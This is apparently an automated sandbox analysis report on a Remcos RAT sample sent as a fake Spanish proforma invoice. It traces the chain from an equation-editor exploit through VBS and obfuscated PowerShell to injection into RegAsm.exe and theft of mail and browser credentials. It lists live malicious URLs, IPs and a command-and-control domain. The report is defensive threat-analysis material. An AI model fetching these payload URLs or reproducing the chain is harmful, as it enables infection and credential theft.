                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword16_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword16_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword16_2_00402DB3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3036, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2092, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-EPF38IJump to behavior
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3036, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe14_2_0040569A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting
                  Valid Accounts11
                  Native API
                  111
                  Scripting
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  15
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts43
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  2
                  Obfuscated Files or Information
                  211
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts122
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  2
                  Credentials in Registry
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares2
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  Login Hook1
                  Windows Service
                  1
                  Bypass User Account Control
                  3
                  Credentials In Files
                  4
                  File and Directory Discovery
                  Distributed Component Object Model211
                  Input Capture
                  1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts3
                  PowerShell
                  Network Logon Script422
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets38
                  System Information Discovery
                  SSH3
                  Clipboard Data
                  3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials3
                  Security Software Discovery
                  VNCGUI Input Capture114
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync21
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                  Process Injection
                  Proc Filesystem4
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522666 Sample: factura proforma .docx.doc Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 57 og1.in 2->57 89 Multi AV Scanner detection for domain / URL 2->89 91 Suricata IDS alerts for network traffic 2->91 93 Found malware configuration 2->93 95 21 other signatures 2->95 12 WINWORD.EXE 318 54 2->12         started        signatures3 process4 dnsIp5 61 91.134.96.177, 49169, 49171, 49173 OVHFR France 12->61 63 og1.in 172.67.216.244, 443, 49163, 49165 CLOUDFLARENETUS United States 12->63 65 104.21.78.54, 443, 49164, 49166 CLOUDFLARENETUS United States 12->65 51 C:\Users\user\...\uc on 91.134.96.177.url, MS 12->51 dropped 53 C:\Users\user\AppData\Roaming\...\S7UYq0.url, MS 12->53 dropped 55 ~WRF{29D0D8AE-3680...5-4CF617677437}.tmp, Composite 12->55 dropped 123 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->123 125 Office viewer loads remote template 12->125 127 Microsoft Office drops suspicious files 12->127 17 EQNEDT32.EXE 12 12->17         started        file6 signatures7 process8 file9 49 picturewithherimag...goodforyourhear.Vbs, Unicode 17->49 dropped 85 Office equation editor establishes network connection 17->85 87 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 17->87 21 wscript.exe 1 17->21         started        signatures10 process11 signatures12 97 Suspicious powershell command line found 21->97 99 Wscript starts Powershell (via cmd or directly) 21->99 101 Bypasses PowerShell execution policy 21->101 103 2 other signatures 21->103 24 powershell.exe 4 21->24         started        process13 signatures14 113 Suspicious powershell command line found 24->113 115 Obfuscated command line found 24->115 117 Suspicious execution chain found 24->117 27 powershell.exe 12 5 24->27         started        process15 dnsIp16 59 raw.githubusercontent.com 185.199.109.133, 443, 49172 FASTLYUS Netherlands 27->59 119 Writes to foreign memory regions 27->119 121 Injects a PE file into a foreign processes 27->121 31 RegAsm.exe 3 13 27->31         started        36 RegAsm.exe 27->36         started        signatures17 process18 dnsIp19 67 maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro 45.90.89.98, 49174, 49175, 6845 CMCSUS Bulgaria 31->67 69 geoplugin.net 178.237.33.50, 49176, 80 ATOM86-ASATOM86NL Netherlands 31->69 47 C:\Users\user\AppData\Local\Temp\...\logs.dat, data 31->47 dropped 71 Detected Remcos RAT 31->71 73 Maps a DLL or memory area into another process 31->73 75 Installs a global keyboard hook 31->75 38 RegAsm.exe 1 31->38         started        41 RegAsm.exe 31->41         started        43 RegAsm.exe 11 31->43         started        45 RegAsm.exe 31->45         started        77 Contains functionality to bypass UAC (CMSTPLUA) 36->77 79 Tries to steal Mail credentials (via file registry) 36->79 81 Contains functionalty to change the wallpaper 36->81 83 5 other signatures 36->83 file20 signatures21 process22 signatures23 105 Tries to steal Instant Messenger accounts or passwords 38->105 107 Tries to steal Mail credentials (via file / registry access) 38->107 109 Searches for Windows Mail specific files 38->109 111 Tries to harvest and steal browser information (history, passwords, etc) 41->111

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  factura proforma .docx.doc11%VirustotalBrowse
                  factura proforma .docx.doc13%ReversingLabs
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{29D0D8AE-3680-4F24-B6B5-4CF617677437}.tmp100%AviraEXP/CVE-2017-11882.Gen
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  og1.in0%VirustotalBrowse
                  raw.githubusercontent.com0%VirustotalBrowse
                  geoplugin.net0%VirustotalBrowse
                  maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro8%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                  http://acdn.adnxs.com/ast/ast.js0%VirustotalBrowse
                  http://b.scorecardresearch.com/beacon.js0%VirustotalBrowse
                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%VirustotalBrowse
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%VirustotalBrowse
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%VirustotalBrowse
                  http://www.diginotar.nl/cps/pkioverheid00%VirustotalBrowse
                  https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
                  https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%VirustotalBrowse
                  http://www.nirsoft.net0%VirustotalBrowse
                  http://cache.btrll.com/default/Pix-1x1.gif0%VirustotalBrowse
                  https://og1.in/S7UYq00%VirustotalBrowse
                  http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%VirustotalBrowse
                  http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%VirustotalBrowse
                  https://www.google.com0%VirustotalBrowse
                  http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFj0%VirustotalBrowse
                  https://support.google.com/chrome/?p=plugin_flash0%VirustotalBrowse
                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%VirustotalBrowse
                  http://o.aolcdn.com/ads/adswrappermsni.js0%VirustotalBrowse
                  http://www.msn.com/?ocid=iehp0%VirustotalBrowse
                  http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%VirustotalBrowse
                  https://login.yahoo.com/config/login0%VirustotalBrowse
                  http://www.msn.com/de-de/?ocid=iehp0%VirustotalBrowse
                  http://static.chartbeat.com/js/chartbeat.js0%VirustotalBrowse
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%VirustotalBrowse
                  https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%VirustotalBrowse
                  http://91.134.96.1771%VirustotalBrowse
                  http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%VirustotalBrowse
                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%VirustotalBrowse
                  http://www.nirsoft.net/0%VirustotalBrowse
                  http://91.134.96.177/80/WRRDFC.txt0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  og1.in
                  172.67.216.244
                  truetrueunknown
                  raw.githubusercontent.com
                  185.199.109.133
                  truefalseunknown
                  geoplugin.net
                  178.237.33.50
                  truefalseunknown
                  maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  45.90.89.98
                  truetrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  https://og1.in/S7UYq0falseunknown
                  http://91.134.96.177/80/WRRDFC.txttrueunknown
                  https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                    unknown
                    maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.protrue
                      unknown
                      http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doctrue
                        unknown
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        unknown
                        http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFtrue
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://b.scorecardresearch.com/beacon.jsbhv77DF.tmp.15.drfalseunknown
                          http://acdn.adnxs.com/ast/ast.jsbhv77DF.tmp.15.drfalseunknown
                          http://www.imvu.comrRegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            unknown
                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv77DF.tmp.15.drfalseunknown
                            http://ocsp.entrust.net03powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv77DF.tmp.15.drfalseunknown
                            https://contoso.com/Licensepowershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000F.00000002.423803853.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.423808460.0000000002C90000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.423818724.0000000002DE0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv77DF.tmp.15.drfalseunknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv77DF.tmp.15.drfalseunknown
                            http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv77DF.tmp.15.drfalseunknown
                            http://www.nirsoft.netRegAsm.exe, 0000000F.00000002.423427306.00000000003A3000.00000004.00000010.00020000.00000000.sdmpfalseunknown
                            https://deff.nelreports.net/api/report?cat=msnbhv77DF.tmp.15.drfalseunknown
                            https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv77DF.tmp.15.drfalseunknown
                            http://go.microspowershell.exe, 0000000C.00000002.411890930.00000000029F9000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                unknown
                                http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFjEQNEDT32.EXE, 00000008.00000002.392960157.00000000005BE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                http://cache.btrll.com/default/Pix-1x1.gifbhv77DF.tmp.15.drfalseunknown
                                http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv77DF.tmp.15.drfalseunknown
                                https://www.google.comRegAsm.exe, RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                http://geoplugin.net/json.gp/Cpowershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://o.aolcdn.com/ads/adswrappermsni.jsbhv77DF.tmp.15.drfalseunknown
                                http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv77DF.tmp.15.drfalseunknown
                                http://www.msn.com/?ocid=iehpbhv77DF.tmp.15.drfalseunknown
                                https://contoso.com/powershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv77DF.tmp.15.drfalseunknown
                                http://static.chartbeat.com/js/chartbeat.jsbhv77DF.tmp.15.drfalseunknown
                                http://www.msn.com/de-de/?ocid=iehpbhv77DF.tmp.15.drfalseunknown
                                http://91.134.96.177powershell.exe, 0000000C.00000002.411890930.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv77DF.tmp.15.drfalseunknown
                                https://login.yahoo.com/config/loginRegAsm.exefalseunknown
                                http://www.nirsoft.net/RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                http://ocsp.entrust.net0Dpowershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.418435992.0000000002710000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.411890930.00000000026B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv77DF.tmp.15.drfalseunknown
                                  http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv77DF.tmp.15.drfalseunknown
                                  http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv77DF.tmp.15.drfalse
                                    unknown
                                    https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv77DF.tmp.15.drfalse
                                      unknown
                                      http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv77DF.tmp.15.drfalse
                                        unknown
                                        http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv77DF.tmp.15.drfalse
                                          unknown
                                          http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.ccleaner.com/go/app_cc_pro_trialkeybhv77DF.tmp.15.drfalse
                                            unknown
                                            http://crl.entrust.net/server1.crl0powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.imvu.com/RegAsm.exe, 00000012.00000002.420615774.00000000003BC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                unknown
                                                https://contextual.media.net/8/nrrV73987.jsbhv77DF.tmp.15.drfalse
                                                  unknown
                                                  http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000012.00000002.420592659.00000000001C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    unknown
                                                    https://contoso.com/Iconpowershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://contextual.media.net/bhv77DF.tmp.15.drfalse
                                                      unknown
                                                      http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv77DF.tmp.15.drfalse
                                                        unknown
                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv77DF.tmp.15.drfalse
                                                          unknown
                                                          http://www.msn.com/bhv77DF.tmp.15.drfalse
                                                            unknown
                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv77DF.tmp.15.drfalse
                                                              unknown
                                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv77DF.tmp.15.drfalse
                                                                  unknown
                                                                  https://raw.githubusercontent.compowershell.exe, 0000000C.00000002.411890930.00000000027EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://cdn.at.atwola.com/_media/uac/msn.htmlbhv77DF.tmp.15.drfalse
                                                                      unknown
                                                                      http://go.microsoft.cpowershell.exe, 0000000C.00000002.411601940.000000000016A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                          unknown
                                                                          http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv77DF.tmp.15.drfalse
                                                                            unknown
                                                                            https://secure.comodo.com/CPS0powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://91.134.96.177/80/uc/uc on 91.134.96.177.url.0.drfalse
                                                                                unknown
                                                                                https://policies.yahoo.com/w3c/p3p.xmlbhv77DF.tmp.15.drfalse
                                                                                  unknown
